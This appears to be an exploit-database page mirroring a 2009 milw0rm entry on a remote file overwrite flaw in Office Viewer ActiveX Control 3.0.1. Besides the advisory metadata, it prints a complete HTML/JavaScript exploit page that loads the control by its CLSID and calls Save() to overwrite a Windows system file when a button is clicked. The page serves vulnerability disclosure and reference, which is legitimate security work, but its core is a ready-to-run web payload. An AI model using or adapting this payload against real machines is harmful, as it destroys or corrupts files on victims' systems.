header-logo
Suggest Exploit
vendor:
Office Viewer ActiveX Control
by:
Houssamix
9.3
CVSS
HIGH
Remote File Overwrite
264
CWE
Product Name: Office Viewer ActiveX Control
Affected Version From: 3.0.1
Affected Version To: 3.0.1
Patch Exists: NO
Related CWE: N/A
CPE: a:microsoft:office_viewer_activex_control
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP Professional SP2
2009

Office Viewer ActiveX Control v 3.0.1 Remote File Overwrite exploit

This exploit allows a remote attacker to overwrite a file on the vulnerable system. The exploit is triggered by a malicious website containing a malicious JavaScript code which calls the Save() method of the vulnerable Office Viewer ActiveX Control v 3.0.1. The malicious JavaScript code can be used to overwrite any file on the vulnerable system.

Mitigation:

The user should not visit untrusted websites and should not open untrusted files.
Source

Exploit-DB raw data:

=======================================================================================<br>
Author: Houssamix									   <br>
=======================================================================================<br>

 Office Viewer ActiveX Control v 3.0.1 Remote File Overwrite exploit		<br>


 Tested on Windows XP Professional SP2 , with Internet Explorer 6	<br>


=======================================================================================<br>
<HTML>
<BODY>
 <object id=hsmx classid="clsid:{97AF4A45-49BE-4485-9F55-91AB40F288F2}"></object>

<SCRIPT>

function Do_it()
 {
     File = "c:\\windows\\system_.ini"
   hsmx.Save(File)
 }

</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="execute exploit"><br>
</body>
</HTML>
=======================================================================================<br>

This was written for educational purpose. Use it at your own risk.<br>
Author will be not responsible for any damage.<br>

# milw0rm.com [2009-01-13]

Navigation

Suggest Exploit

Services By CQR